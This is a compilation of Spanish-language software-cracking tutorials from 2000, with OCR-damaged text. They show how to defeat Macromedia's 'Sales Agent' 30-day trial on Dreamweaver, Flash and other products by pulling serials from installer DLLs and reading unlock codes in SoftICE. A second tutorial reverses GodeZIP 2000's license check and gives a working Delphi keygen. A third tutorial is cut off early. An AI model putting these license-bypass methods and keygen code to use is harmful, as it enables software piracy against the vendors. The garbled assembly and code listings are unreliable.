DOWNLOAD : | http://www.macromedia.com/es/ 
Herramientas: SoftICE v3.24, W32dsm89 y MS-DOS EDIT versión 2.0.026 :-)) 


CRACKER: Arkanian | FECHA: 


| 14/08/2000 


INTRODUCCION 


Esto es una tomadura de pelo general. No tiene otro calificativo. Estas "protecciones comerciales” no valen ni 
siquiera el peso del plástico donde vienen envueltas. En fin, ellos sabrán porqué confian sus carísimos 
productos a la endeble "protección" de este tipo de Software. 


El procedimiento descrito debajo ha sido probado con ÉXITO en los siguientes productos de 
MACROMEDIA. 


COURSEBUILDER for DREAMWEAVER 
DREAMWEAVER 3 

DRUMBEAT 2000 E-COMMERCE EDITION 
DRUMBEAT 2000 JAVA SERVER PAGES 
FIREWORKS 3 

FLASH 4 


Todos estos programas son versiones limitadas de 30 días de duración pero totalmente funcionales durante 
ese periodo. 


Este es uno de esos casos donde los árboles no nos dejan ver el bosque. Por que, a fin de cuentas ¿qué es 
Sales Agent?... nada más y nada menos que una enorme y molesta NAG SCREEN, ¿qué hace falta para 


quitarla?, ...pues un código, pues vamos a buscar ese código. 


Así de simple y ...eficaz. 


AL ATAKE 
Vamos a instalar DREAMWEAVER 3 como programa de ejemplo, lo que sigue a continuación es totálmente válido 
para el resto de programas citados arriba. 
INSTALL... 
El programa se desempaqueta, aparece un viejo conocido, InstallShield, que nos cuenta no se qué del Setup, esperamos 
y aparece el Setup con la ventana de bienvenida. Aquí hacemos un alto. Minimizamos la instalación y vamos a 


CAWINDOWSITEMPA_ISTMP1.DIRY_ ISTMPO.DIR. 


Un archivo de nombre SERIALIZATION30.DLL. llama rápidamente nuestra atención, ¿a que suena bien?, vamos a 
echar un vistazo dentro de ese archivo. 


Y vamos a usar el viejo EDIT del DOS, así que abrimos una ventana DOS, tecleamos EDIT y luego vamos a ARCHIVO, 
ABRIR, buscamos el archivo, marcamos la casilla de ABRIR BINARIO, INTRO, y ya estamos dentro. 


Parece chino ¿verdad?, pero esto da mucho juego, ahora vamos a buscar la palabra "registration", así que AIt+B e 
INTRO, ponemos la palabreja, Aceptar y mira lo que aparece: 


Números de serie y claves de registro y no solo del programa que estamos instalando también de otras versiones y de 
otros programas. Papel y lápiz y tomemos la oportuna nota de todo. 


Para el resto de programas estos son los archivos que encontramos: 


COURSEBUILDER for DREAMWEAVER: SERIALINFO.DLL (manda cojones). 

DRUMBEAT 2000 E-COMMERCE EDITION: SERIALIZATION20.DLL 

DRUMBEAT 2000 JAVA SERVER PAGES: SERIALIZATION20.DLL (el mismo que el anterior). 
FIREWORKS 3 : SERIALIZATION.DLL 

FLASH 4: INSTALER.DLL 


NANO 


Los abrimos todos con el EDIT y conseguimos un montón de números de serie y códigos de producto, ya veremos si 


podemos ponerlos en algún lado. 

Vamos a finalizar la instalación y ejecutar el programa... 

EL PROGRAMA... 

Iniciamos DREAMWEAVER 3 y conseguimos un estupendo pantallazo del SoftICE, '...fallo general de 
protección". Parece que la cosa se complica, esto me suena a un ANTI-DEBUGGER. Probemos otra vez, y 


...efectivamente, salta el SoftICE otra vez con ese mensaje de error y cuando volvemos a Windows el programa no se 
ha iniciado. 


Y ahora viene la parte rara, después del primer pantallazo del SoftICE (con el mensaje de fallo de protección) saltó 
el antivirus, un misterioso archivo llamado z36jeah0.sys había aparecido en mi disco duro y estaba tratando de hacer 
algo. 


Rapidamente lo desinfecté y lo borré, dos minutos después, con el segundo pantallazo, ¡había aparecido de nuevo!, 
lo volví a borrar, pero esto me dejo con la mosca detras de la oreja, 


Al día siguiente, metiendole mano al FIREWORKS 3 y examinando un archivo llamado rsagnt32.tty con el 
W32dsm89, no me sorprendió nada que saltara el antivirus otra vez. Otro archivo, este de nombre z36jaezn.sys, 
habia aparecido en Cu y estaba tratando de hacer alguna cosa. 


¿Justo después del uso de un DEBUGGER?, que curioso, que salte UNA vez puede ser una casualidad, que 
salte DOS veces el antivirus es una coincidencia, pero TRES veces apunta a una conspiración. 


¿Qué son estos archivos de sistema?, ¿Quien o qué los instala?, ¿Porqué salta el antivirus?. 


Este es el registro de actividades de mi antivirus, las dos primeras entradas son cuando intentaba ejecutar el 
DREAMWEAVER 3 y la otra del FIREWORKS 3. ¿Qué podemos pensar de todo esto?. 


Registro de actividades El ES 


C:Az36jaeh0. sys Ayuda 
podría estar infectado por un virus desconocido. 
El archivo ha sido reparado. 


Registro de actividades: 115 entradas 

Cerrar 
Fecha: 1220800, Hora: 17:24:02, 
El archivo primi 
CA z36jaehO.sys . ler 
podría estar infectado por un virus desconocido. . 
El archivo ha sido reparado. Filis. | 
Fecha: 12/0800, Hora: 17:26:02, Waciar... 
El archivo 


Fecha: 13/0800, Hora: 16:02:30, 

El archiwo 

CAz3bjaezn.sys 

podría estar infectado por un virus desconocido, 
El archivo ha sido reparado. 


Gal 
E 


Bueno tras este breve paréntesis, continuamos, vamos a reiniciar y NO vamos a cargar el SoftICE, para esto deberás 
añadir al autoexec.bat las siguientes lineas, (así es como lo tengo yo): 


CHOICE /T:N,5 "Cargar Debugger Soft-Ice " 


IF ERRORLEVEL 2 GOTO SEGUIR 
CMARCHIV-INNUMEGANSOFTIC-1WINICE.EXE 
¿SEGUIR 


Esto te dará cinco segundos para decidir si quieres cargarlo o no cuando reinicies la máquina. Reiniciamos, no tocamos 
nada, el SoftICE no se carga. Vamos al DREAMWEAVER 3 otra vez. 


Esta vez si. Una ventana, con un enorme logotipo del producto, nos informa que nos quedan 30 dias de prueba, 
tenemos también varios botones de opción. Pulsamos sobre TRY y observamos el logotipo cuando se inicie el 
programa. 


Abajo a la izquierda aparece un número del tipo DWW300-XXXX...., ¿no lo hemos visto antes?, consulta las notas, es el 
código que identifica al producto DREAMWEAVER versión 3.0.0, subrayalo, lo necesitaremos después. Cierra el 
programa y abrelo de nuevo. 


De cabeza al botón de BUY NOW. Rellena los diversos formularios con los datos que te de la gana, es un poco 
trabajoso ya lo se. Activa lo de la tarjeta de crédito (Go offline) para no rellenar nada en esta ventana, parece ser que el 
programita "sabe" cual es el formato de los números de las tarjetas de crédito y hasta que no encuentras un formato 
válido no te deja seguir. 


En la ventana siguiente escoge MAIL/FAX. Por fin llegamos a la ventana final, pulsamos DONE y todavía nos aparece 
otra ventana que nos informa amablemente que los datos han sido registrados y que mandarán un UNLOCKING CODE 
para hacerlo totalmente funcional, es decir, sin la limitación de los 30 días. 


Salimos y volvemos a entrar en BUY NOW. La cosa ha cambiado, ya no aparecen los formularios, aparece una ventana 
con varios campos, uno con los datos que hemos puesto, otro con un PERSONAL CODE (esta atenuado) y otro en 
blanco esperando el UNLOCKING CODE. 


Vuelve atras y mira la pantalla, BUY NOW, TRY y CANCEL, y el aviso de 30 días, ¿no has visto algo parecido en algún 
otro programa?... 


Y ahora viene la parte divertida. 
HAGASE LA LUZ... 


Vamos a reiniciar y a cargar el SoftICE. Esta ventana de inicio con sus botones de BUY NOW, TRY y CANCEL, y el 
aviso de 30 días, ¿no tiene cierto parecido a la de WinZip y su aviso de 21 días? 


BUY NOW = REGISTRATION 
TRY= ] AGREE 
CANCEL = pues CANCEL 


Así que vamos a intentar la misma estrategia que se necesita para buscar el SERIAL de WinZip. ¿A que parece una 
autentica tontería? 


Una duda: 


Cuando ejecutamos el DREAMWEAVER 3, este nos detecta el DEBUGGER y nos cuelga el proceso de ejecución, 
pero, ¿pasará lo mismo si lo cargamos con el LOADER del Sice?. 


No cuesta nada probar, ...reiniciamos y vamos al SoftICE Loader. 
SOFTICE LOADER... 


Cargamos el programa en el Loader, hacemos caso omiso al error y, saltamos a SoftICE, estamos en el punto de 
entrada al programa, en Dreamweaver3! .text + 00018E90, le damos a F10 para movernos una posición y que 
aparezca el código. Asignamos las ventanas de datos de esta forma DEX 0 EAX, DEX 1 ES:EDI, DEX 2 DS:ESL. 


Y ahora, después de lo del antivirus, sin contemplaciones: BPX GETDLGITEMTEXTA, pulsamos F5 para volver a la 
ventana del programa y... ¡ahí esta!. NO ha pasado nada, NO ha saltado el pantallazo de error cuando entra la rutina 
ANTI-DEBUGGER, NO ha saltado el antivirus, nada de nada. 


Botón de BUY NOW rellamos el UNLOCK CODE con 1234567890 (vamos a probar con diez caracteres) y le damos al 
OK. Saltamos a Soft[CE en GETDLGITEMTEXTA, dale al F11 para salir al código real y aterrizamos en RSAGNT32! 
«text + 4BD1, esto pertenece al archivo rsagnt32.tty. 


En FLASH 4 y en DRUMBEAT 2000 este archivo tiene extensión DLL, pero el código es el mismo. 
Este es el código, creo que no hacen falta muchas explicaciones: 


* Reference To: USER32, GetDlgltemTextA. Ord: 0140h 

| 

:10005AC1 FF1570120210 Call dword ptr [10021270] “>Después de F11 caemos aquí. 
:10005AC7 BFCC8F0210 mov edi, 10028FCC $ Nuestro Serial chungo en ES:EDI. 
:10005ACC 83C9FF or ecx, FEFFFEFF 

:10005ACF 33C0 xor eax, eax 

:10005AD1 F2 repnz 

:10005AD2 AE scasb 

:10005AD3 F7D1 not ecx “9 No más caracteres. 

:10005ADS 49 dec ecx 

:10005AD6 83F90A cmp ecx, 0000000A =$ ¿Diez carateres? 

:10005AD9 7455 je 10005B30 $ OK, saltamos... 


* Referencered by a (U)nconditional or (C)onditional Jump at Address: 

|:10005AD9(C) 

| 

:10005B30 E83BBBFFFF call 10001670=9Aterrizamos aquí. 

:10005B35 8D953CFFFFFF lea edx, dword ptr [ebp+FFFFFF3C] 

:10005B3B mov edi, 10028FC0 +PERSONAL CODE y nuestro SERIAL juntos en ES:EDL 
:10005B40 83C9FF or ecx, FFFFFFFF 

:10005B43 33C0 xor eax , eax 

:10005B45 F2 repnz “SPilla SOLO el 


:10005B46 AE scasb FWPERSONAL CODE de ES:EDI 
:10005B47 F7D1 not ecx 

:10005B49 2BPF9 sub edi, ecx 

:10005B4B 8BC1 mov eax, ecx 


:10005B4D 8BF7 mov esi, edi Y% PERSONAL CODE en DS:ESI 
:10005B4F S8BFA mov edi,edx 

:10005B51 C1E902 shr ecx, 02 

:10005B54 F3 repz 

:10005B55 AS movsd 

:10005B56 8BC8 mov ecx, eax 

:10005B58 83E103 and ecx, 00000003 

:10005B5B F3 repz 

:10005B5C A4 movsb 

:10005B5D 8D8D70FFFFFF lea ecx, dword ptr [ebp+FFFFFF70] 
:10005B63 51 push ecx 

:10005B64 8B 1594870210 mov edx, dword ptr [10028794] 
:10005B6A 81C206010000 add edx, 00000106 

:10005B70 52 push edx 

:10005B71 8D853CFFFFFF lea eax, dword ptr [ebp+FFFFFF3C] 
:10005B77 50 push eax 


:10005B78 ESD36D0000 call 1000C950=9A quí se genera el UNLOCK CODE. 


:10005B7D 83C40C add esp, 0000000C -3Con el retorno del CALL, el UNLOCK CODE en EAX 
:10005B80 33F6 xor esi, esi 
:10005B82 89B538FFFEFF mov dword ptr [ebp+FFFFFF38], esi 


:10005B88 68CC8F0210 push 10028FCC -9FASTUOSO, NUESTRO SERIAL CHUNGO. 


:10005B8D 8D8D7OFFFFFF lea ecx, dword ptr [ebp+FFEFFF70] 
:10005B93 51 push ecx 


Como podeis ver, esto es lo que hay. Lamentable desde cualquier punto de vista. Es ridículo, ¡He visto crackme's más 
complicados! 


El código mueve nuestro SERIAL a ES:EDI, lo compara con 10 (0A) y si hay diez caracteres salta, coge el PERSONAL 
CODE, lo marea un rato y nos marea a nosotros de paso, entramos en el CALL 1000C950 y aquí va transformado el 
PERSONAL CODE, mediante unas tablas compuestas exclusivamente de letras (PYUXAHLLRO .. JIKLICBXZC .. 
PQYZMERUOA .. etc.), en el UINLOCKING CODE. ¡A ver los especialistas del Keygenning! 


Una vez generado el UINLOCKING CODE lo planta en EAX y con el retorno de la llamada vemos el dichoso 
UNLOCKING CODE en nuestra ventana de datos número (0), ¡alehop!, EAX 9 YFYJYJLXKH, ¡muy amable! (aquí es 
cuando tomamos nota). 


Luego siguen una seríe de rutinas de encriptación, etc, etc. Si teneis curiosidad por saber que forma tiene el 
UNLOCKING CODE encriptado, busca un pequeño archivo llamado rsagent.ini en CAWINDOWS. 


Entre otra información, verás algo parecido a esto: 


email= 

personalCode=1001565465 $ Mira lo que hay aquí. 
perkey=08$'$ST+7YGOK7L'X"M2*40H4_ Vaya pinta, ¿no? 
datalen=26 

toneDial=1 

callWait=0 

need Access=0 

accessCode=9 

intlPrefix= 

callWaitStr= 

mailStat-391842=1 


Por cierto, el personalCode de este archivo, no se corresponde con el UNLOCKING CODE del valor de EAX de antes.;- 
) Cada vez que cambias alguno de tus datos, se genera un personalCode nuevo. 


Si en SoftICE sustituimos la instrucción PUSH 10028FCC (nuesto serial) por la dirección del UNLOKING CODE, que 
está en EAX, el programa se registra solo, ¡El SERIAL se compara consigo mismo!, ¿Que tipo de protección es está?. 


PREGUNTA... 


¿Se puede hacer un crack genérico haciendo una copia de este archivo, modificarlo con un editor hexadecimal y 
sustituir el original por el nuestro en programas con este tipo de "protección"? 


Por cierto, mientras escribía esto estaba con el FLASH 4 y me acaba de saltar el antivirus con otro de esos archivos 
raros. Este se llama z36toc3v.sys. Hala ...¡a hacer puñetas!. 


REGISTRO DEL PROGRAMA... 


Pues una vez que tienes tu UNLOCKING CODE lo pones en la casilla correspondiente, a continuación el programa 
pedirá un SERIAL NUMBER que ya tenemos apuntado gracias a nuestra investigación por el CAWINDOWSITEMP y a 
los archivos SERIALIZATION*.DLL 


En otra ventana te pedirá un CÓDIGO DE PRODUCTO que también tenemos gracias a los mismos archivos y a nuestro 
viejo y eficaz MS-DOS EDIT. 


Para más coña las ventanas de registro te ayudan, en la ventana de registro del código de producto ya pone DWW300- 
Con ¿para que metas el código que falta, (impresentable). 


UNOS APUNTES... 


Ya tenemos los programas adecuadamente registrados, entonces pasa una cosa curiosa, aparece una ventana de 
UPDATING (con dos carpetitas y un papel volando de una a otra) y Sales Agent desaparece completamente de nuestro 
disco duro, ¡Adios!, dejando los programas totalmente desencriptados y funcionales 


Otra cosa curiosa, si desinstalas un programa que ya hayas registrado y lo vuelves a instalar de nuevo, Sales Agent no 
aparece por ningún lado. El programa está completo y se ejecuta normalmente, algo se ha quedado por el registro de 
Windows, seguro. 


PUNTO FINAL. 


Tenemos ya los programas adecuadamente registrados en nuestro ordenador. ¿Qué nos impide ir a la página de 
MACROMEDIA completar el registro y ser usuarios debidamente autorizados?. 


Nada evidentemente, tenemos todo, PERSONAL CODE, UNLOCKING CODE, NUMERO DE SERIE y CODIGO DE 
PRODUCTO. 


Vamos a dar una vuelta por MACROMEDIA ESPAÑA más que nada por la curiosidad de saber el precio de venta de 
todos estos programas. 


Aquí tienes la dirección http://www.macromedia.com/es/ 


En la tabla de abajo esta el precio de los productos "protegidos" con Sales Agent. Se pueden bajar las versiones de 
demostración del enlace PRODUCTOS. 


Por cierto, he pasado de registrarme, ¿para qué?, yo no voy a utilizar estos programas para nada, mi objetivo ERA 
Sales Agent. 


PRODUCTO PRECIO EN $ * [PRECIO EN PELAS 
COURSEBUILDER for DREAMWEAVER|  199$ + 36.000 
DREAMWEAVER 299 $ + 55.000 
*DRUMBEAT 2000 E-COMMERCE | 599% | 110.000 
*DRUMBEAT 2000 JAVA SERVER | 599% | 110.000 
FIREWORKS 3 199 $ + 36.000 
FLASH 4 299$ | +55.000 


* El DRUMBEAT, no lo tenian ni referenciado de lo nuevo que es. He tenido que ir a yankilandia a mirar. 
* El valor del dólar está calculado según el cambio al cierre del Mercado de Divisas a 11/08/00. 


CONCLUSIONES... 


Sin comentarios... 


Karpoff Spanish Tutor 


Programa: | GodeZIP 2000 v7.8 


PROTECCION: "Numero de Serie, Limitacion de Usos 


Descripcion: Programa de Compresion. 
Dificultad: Aficionado 


DOWNLOAD : 


http://home.worldnet.fr/dgode 


Herramientas: SICE y Algun lenguaje de Programacion 
CRACKER: RAZIiEL FECHA: 07/09/2000 


INTRODUCCION 


1.- Saludos: 


Hola a todos, de vuelta a las andadas, soy RAZiEL, del Grupo [K-FoR], y sólo 
deciros, que me alegra mucho el nivel de aceptación que está teniendo el grupo aún 
antes de haber salido “Oficialmente”; Espero que aprendáis un poco más hoy sobre las 
protecciones, y nada, a lo nuestro. 


Ten en cuenta que este tutorial está realizado únicamente con fines educativos, y que 
no puedo hacerme responsable del mal uso que se pueda hacer de la información aquí 
expuesta. Si te gusta el programa CÓMPRALO. 


AL ATAKE 
2.- Conociendo a la Víctima: 


GodeZIP 2000 v7.8 para Windows, un programa para el tratamiento de la compresión, tanto por 
volúmenes como por archivos únicos que maneja la mayoría de los compresores que actualmente existen; 
pero queda mucho atrás de otros programas pertenecientes a su categoría, pues compresión por RAR; por 
ejemplo, no está a nuestra disposición. 


Hacemos la instalación de nuestro flamante programa y, tras ejecutarlo, aparece ventana pantalla 
como esta: 


GodeZIP Setup 


Quick | Compression] method | files | decompression associations 
F associations 


| Associate GodeZIP with files of type : 


.goz GodeZIP compressed file 

.2 GZIP old compressed format 
92 — GZIP compressed format 
tgz Archive TAR compressed 
aj Archive ARJ 

tar Archive TAR bitmap 
Archive TAR compressed 
ap Archive PKZIP 

.spt — GodezZIP splitted file 

cry GodeZIP encrypted file 
.bz2  Bzip2 compressed file 
.cab MS Cabinet file 


Use Explorer shell 
y Extention 


[Y 'popup' shell menu 


SURE KEKEKEKGKGEK 


Cancel | About | Help 


Este programa, cada vez que lo intentas registrar y fallas 4 veces la introducción del LICENSE 
NUMBER (LN) y el CODIGO CORRESPONDIENTE (CC) correspondiente, se cierra, y “pierdes” una oportunidad 
de uso. En este punto, os diré, que GodeZIP tiene un fallo ENORME, ya que si la primera vez que lo 
ejecutamos, en vez de darle a OK, pulsamos About e introducimos 4 veces el LN y el CR de manera 
incorrecta, no “pierdes” oportunidades de uso, puesto que empieza a contar el número de usos cuando 
está completamente configurado. 


3.- Toma de Contacto: 
Bien; pulsamos About y “Enter my code” e introducimos, por ejemplo: 


License Number (LN): 12345678912345 
Corresponding Code (CC): 987654321312 


Y... nada, ventanazo; BAD LN; BAD CC; RETRY... Bien... pues a CRACKEARLO!!!, pero antes; echemos 
un vistazo con File Analizer para ver si está empaquetado... y... no lo está (mejor, así nos 
ahorramos trabajo). 


Comentario Sabroso: La longitud mínima del Serial de dicho programa son 15 Dígitos (pues realiza 15 
comprobaciones distintas con los diversos números introducidos); no creáis que he introducido tantos 
dígitos por casualidad. 


Cargamos SICE y al lío... 
4.- Destripando... 


Entramos de nuevo en el programa; y sin pulsar OK (Para evitar que la barrita de usos suba), 
pulsamos About; y tras meter el LN y CC; pulsamos CTRL + D para ir a SICE y ponemos los clásicos BPX 
GETDLGITEMTEXTA, SHOWWINDOW... Pulsamos OK y el que pica es GETDLG... 


Bien, hemos caido dentro de USER32; No nos interesa, por lo que pulsamos F12; Ahora dentro de 
GODEZIP, pero hay una llamada a la API tres líneas más abajo, tampoco interesa... por lo que pulsamos 
de nuevo F12 y aparecemos aquí: 


004034E1 call 402934 > Vamos Traceando con F10 para evitar meternos de subrutinas, 
seguimos y... 


004034E6 mov 44F696, ax 
004034EC push 1 
004034E push 44F210 > Nuestro LN 


004034F3 push 44F223 > Nuestro CC 
004034F8 call 402B84 


Vaya, Vaya, GodeZIP pone en esas dos direcciones de memoria nuestro LN y CC; Y llama a una 
función... Sospechoso, ¿Verdad?; ¿Porqué no nos metemos en esa función con F8?; Bien, ya estamos 
dentro, seguimos Traceando y llegamos aquí... 


No sin saber anteriormente qu n EBX está nuestro CC... 


00402BEA cmp byte ptr [ebx], 44h > Compara el primer dígito de nuestro CC con un 44h (“D”) 
00402BE setz al > Introduce “1” si son iguales 

00402BF0O movzx edx, al > Pasa a edx el valor de al 

00402BF3 mov ecx, [ebp+04] > Introduce en ECX, [EBP+04] en adelante; que “casualmente” es 
nuestro LN 

00402BF6 cmp byte ptr [ecx], 47h > Compara el primer dígito de nuestro LN con un 47h (“G”) 
00402BF9 setz al > Introduce “1” si son iguales 

00402BFC. and eax, OFFh .. Modifica el Flag “Z” Según eax 

00402C01 test eax, dx > Testa eax y edx 

00402C03 jz 402DE0 > Si son iguales; sigue con la comprobación, en otro caso: BAD LN... 


Llegados a este punto; tenemos que claramente; El inicio de nuestro CC ha de ser una “D” y el 
inicio de nuestro LN una “G”; en caso contrario saltará el programa y no podremos seguir con la 
comprobación... Seguimos con la siguiente.. 


00402C09 call 402B3C 

00402C0E test eax, eax 

00402C10 jnz 402DE0 

00402C16 movsx edx, byte ptr [ebx+06] > Coge el séptimo carácter del CC y lo introduce en 
EDX 

00402C1A mov ecx, [ebp+04] > Introduce en ECX, [EBP+04] en adelante ( nuestro LN ) 
00402C1D movsx eax, byte ptr [ecx+01] > Coge el Segundo carácter del LN y lo introduce en 


EAX 
00402C21 add eax, 1Eh > suma al carácter de LN 1Eh (“30”) 
00402C24 cmp edx, eax > Compara el resultado con el carácter cogido anteriormente de 
nuestro CC 
00402C26 jnz 402DE0 > En caso de que ambos caracteres sean distintos; salta a BAD LN... 


en otro caso sigue... 


Ya sabemos que nuestro séptimo carácter del CC tiene que ser el segundo del LN + 30d... 


Perfecto; llegados a este punto puedo dejar de explicar el código; ya que las estructuras 
siguientes son idénticas a la anterior, pero cogiendo otros caracteres de LN y CC y sumando una 
cantidad distinta; no obstante adjunto lo que hace: 


Tercera comprobación... 


00402C39 movsx edx, byte ptr [ebx+05] > Coge el sexto carácter del CC 
00402C40 movsx eax, byte ptr [ecx+02] > Coge el tercer carácter del LN 
00402C44 add eax, 17h > Suma (“23”) En decimal... 


Cuarta... 


00402Cc5C movsx edx, byte ptr [ebx+02] > Coge el tercer carácter del CC 
00402C63 movsx eax, byte ptr [ecx+03] > Coge el cuarto carácter del LN 
00402C67 add eax, 1Fh > Suma (“31”) En decimal... 


Quinta... 


00402C7F movsx edx, byte ptr [ebx+07] > Coge el octavo carácter del CC 
00402C86 movsx eax, byte ptr [ecx+04] > Coge el quinto carácter del LN 
00402C8A add eax, 11h > Suma (“17”) En decimal... 


Sexta. 


00402CA2 movsx edx, byte ptr [ebx+03] > Coge el cuarto carácter del CC 
00402CA9 movsx eax, byte ptr [ecx+05] > Coge el sexto carácter del LN 
00402CAD add eax, 13h > Suma (“19“) En decimal... 


Séptima... 


00402CC5 movsx edx, byte ptr [ebx+01] > Coge el segundo carácter del CC 
00402Cccc movsx eax, byte ptr [ecx+06] > Coge el séptimo carácter del LN 
00402CD0O add eax, 15h > Suma (“21“) En decimal... 


Octava... 


00402CE8 movsx edx, byte ptr [ebx+04] > Coge el quinto carácter del CC 
00402CE movsx eax, byte ptr [ecx+07] > Coge el octavo carácter del LN 
00402CF3 add eax, 1Dh > Suma (“29“) En decimal... 


Novena... 


00402D0B movsx edx, byte ptr [ebx+08] > Coge el noveno carácter del CC 
00402D12 mOvsx eax, byte ptr [ecx+08] > Coge el noveno carácter del LN 
00402D16 add eax, 1Eh > Suma (“30“) En decimal... 


Décima... 


00402D2E movsx edx, byte ptr [ebx+09] > Coge el décimo carácter del CC 
00402D35 movsx eax, byte ptr [ecx+0D] > Coge el décimo cuarto carácter del LN 
00402D39 add eax, 1Ch > Suma (“28"“) En decimal... 


Décimo Primera... 


00402D51 movsx edx, byte ptr [ebx+0A] > Coge el decímo primer carácter del CC 
00402D58 mOvsx eax, byte ptr [ecx+0E] > Coge el décimo quinto carácter del LN 
00402D5C add eax, 18h > Suma (“24“) En decimal... 


Décimo Segunda... 


00402D6C movsx edx, byte ptr [ebx+0B] > Coge el décimo segundo carácter del CC 
00402D73 mMOVSX €eax, byte ptr [ecx+0B] > Coge el décimo segundo carácter del LN 
00402D77 add eax, 15h > Suma (“21"“) En decimal... 

Décimo Tercera... 


00402D87 movsx edx, byte ptr [ebx+0C] > Coge el décimo tercer carácter del CC 
00402D8E movsx eax, byte ptr [ecx+0C] > Coge el décimo tercer carácter del LN 
00402D92 add eax, 16h > Suma (“22"“) En decimal... 


Décimo Cuarta... 


00402DA2 movsx edx, byte ptr [ebx+0D] > Coge el décimo cuarto carácter del CC 
00402DA9 movsx eax, byte ptr [ecx+0A] > Coge el décimo primer carácter del LN 
00402DAD add eax, 1Bh > Suma ("27") En decimal... 


Última comprobación... 


00402DBD movsx edx, byte ptr [ebx+0E] > Coge el décimo quinto carácter del CC 
00402DC4 movsx eax, byte ptr [ecx+09] > Coge el décimo carácter del LN 
00402DC8 add eax, 1Dh > Suma ("29") En decimal... 


Bien! En el caso de haber pasado todas las comprobaciones de manera “legal” (también puedes 
trucar los saltos); te aparecerá la ansiada ventana: 


Godezip message 


N Thank for your contribution 


Y nuestro CC habrá quedado transformado en: DKRHTIOEVPMGILV 
5.- Creando un KeyGen: 


Creo que está suficientemente claro lo que hace la rutina de comprobación en cada Caso... así 
que ya podemos crear nuestro KeyGen; Para ello has de tener mínimos conocimientos de programación en 
cualquier lenguaje; yo por ejemplo he escogido Delphi 3.0; aunque se puede hacer en cualquier otro... 


Adjunto mi código en Delphi poco depurado, ya que se podría hacer con Arrays y no de forma tan 
loca; pero, como acabo de empezar a programar en Delphi y todavía no tengo demasiado dominio y, 
además, para que se entienda mejor, lo he dejado así. 


También dejar claro, que puesto que todos los LN y CC comienzan por G y D Respectivamente eso lo 
añadiremos al Final... para poder implementar dicho código será necesario crear un proyecto con los 
siguientes controles y nombres: 


Licencia Button1 [Opcional] 


= GodeZIP KeyGen [K-FoR[] 2000 Aa E 


Codigo Button2 (Dpcional) 


Procedure TForml.Button1Click (Sender: TObject); 


VAR // Declaración de Variables // 


Licensecode, Serialcode 


String; 


P1,P2,P3,P4,P5,P6,P7,P8,P9,P10,P11,P12,P13,P14: Integer; // Todas las Posiciones del LN // 
S1,S2,S3,54,S5,56,S7,S8,S9,S10,S11,S12,513,S14: String; // Todas las posiciones del CC // 


BEGIN //Inicio del Código// 


Licensecode:= Licencia.Text; // Asigna a la variable de Licensecode lo que hay en la 


casilla de Licencia // 


If strLen(pchar (Licensecode)) = 0 Then // Si la longitud de Licensecode =0; es decir, no 
se ha introducido nada... // 
begin 
Showmessage ('Por favor rellena la casilla de licencia'); // Muestra este mensaje // 
exit; 
end; 


If strLen (pchar (Licensecode)) < 14 Then // Si hay menos caracteres de los que usa para 


comprobar... // 


begin 
Showmessage ('Has de Poner los 14 Caracteres'); // Muestra este mensaje // 
exit; 
end; 
P1 := Ord(licensecode[1]); // Asigna el valor Ascii de la posición [x] del LN a un P[x] // 
P1 := P1+30; // Suma “x” en Ascii // 
S6:= Chr(P1); // Convierte el resultado a Carácter y lo asigna a una posición [x] 
determinada del CC // 
P2 := Ord(licensecodel[2]); 
P2 := P2+23; // Repite lo mismo pero con otro valor... // 
S5b:= Chr (P2); 
P3 := Ord(licensecode[3]); 
P3 := P3+31; // Igual... // 
S2:= Chr (P3); 
P4 := Ord(licensecode[4]); 
P4 := P44+17; // Igual... // 
S7:= Chr (P4); 
P5 := Ord(licensecode[5]1); 
P5 := P5+19; // Igual... // 
S3:= Chr(P5); 
P6 := Ord(licensecode[6]); 


P6 :=P6+21; // Igual... // 


sl: 


Chr (P6);5 


P7 := Ord(licensecode[7]); 


P7 :=P74+29; // Igual... // 


S4:= Chr(P7); 

P8 := Ord(licensecode[8]); 
P8 :=P8+30; // Igual... // 
S8:= Chr(P8); 

P9 := Ord(licensecode[9]); 


P9 :=P9+29; // Igual... // 


s14:= Chr (P9); 


P10 := Ord(licensecode[10]); 
P10 :=P10+27; // Igual... // 
S13:= Chr(P10); 

P11 := Ord(licensecode[11]); 
p11 :=P11+21; // Igual... // 
s11:= Chr (P11); 

P12 := Ord(licensecode[12]); 
P12 :=P12+22; // Igual... // 
s12:= Chr (P12); 

P13 := Ord(licensecode[13]); 
P13 :=P13+28; // Igual... // 


S9:= Chr(P13); 


4 := Ord(licensecode[14]); 
P14 :=P14+24; // Igual... // 
0:= Chr (P14); 


Codigo.text:= 'D'+S1+52+53+54+55+56+857+88+89+810+511+S12+S13+S14; //Muestra el CC 
añadiendole “D” al inicio // 

Licencia.Text:='G' + Licensecode; // Al LN le añadimos la “G” Al principio // 

END; 


6.- Finalizando... 


Creo que eso es todo; Lo compiláis y listo; pero si probais con letras puede que dicho algoritmo 
no funcione tal y como debería; por lo que implementamos algo en la caja de texto de Licencia: 


Procedure TForml.LicenciaChange (Sender: TObject); 


begin 


If licencia.Text = '' then exit; 
If (ord(licencia.text [strlen (pchar (licencia.text))]) < 48) or E 
(ord (licencia.text [strlen (pchar (licencia.text))]) > 57) then 


begin 
showmessage ('Sólo Números'); 
licencia.Clear; 
exit; 

end; 


Así hacemos que no se puedan introducir letras en dicha caja, con lo cual nos quitamos de 
problemas ¿Porqué 48 y 577; pues mira una tabla ASCII y lo comprenderás... 


7.- Agradecimientos... 


Espero que os haya servido de algo este tutorial; y sin más me despido por hoy, no sin antes 
darle las gracias al Profesor X y a los demás Crackers del Egroup del cual formo parte; y por 
supuesto a los demás miembros de K-FoR y en especial a ViPER por dejarme el libro del fabuloso 
DELPHI... 

Ya sabéis, para alguna recomendación, consulta, o crítica constructiva: 


Programa: Abracadabra 1.2.6 


Karpoff Spanish Tutor 


PROTECCION: Name / Serial 

Descripcion: Explorador para el windows 

Dificultad: Principiante 

DOWNLOAD : www.lighttek.com 

Herramientas: Softice 

CRACKER: Riverwind | FECHA: 07/09/2000 


INTRODUCCION 


Bueno este es mi primer tutorial y espero que os sirva para algo,mi nivel es algo basico ya que solo llevo un 
par de meses,las razones que me llevaron hacer este tuto es compartir la informacion y por que asi puedo 
aprender mucho mas. 


Con este programa puedes ver casi cualquier archivo.El programa abre muchos tipos de texto y archivos de 
gráficos.También puedes navegar a través de los directorios. 


Este documente es solo con fines educativos y en cualquier caso el autor se hace responsable del mal uso de 


el. 


AL ATAKE 


Lo que vamos hacer es capturar un serial valido,abrimos el simbol loader.clik sobre File y despues Open.....bien,ahora 
le damos a los engranejes y nos aparecera una ventanita,la aceptas y entraras en softice,pulsa Ctrl+D y el programilla 
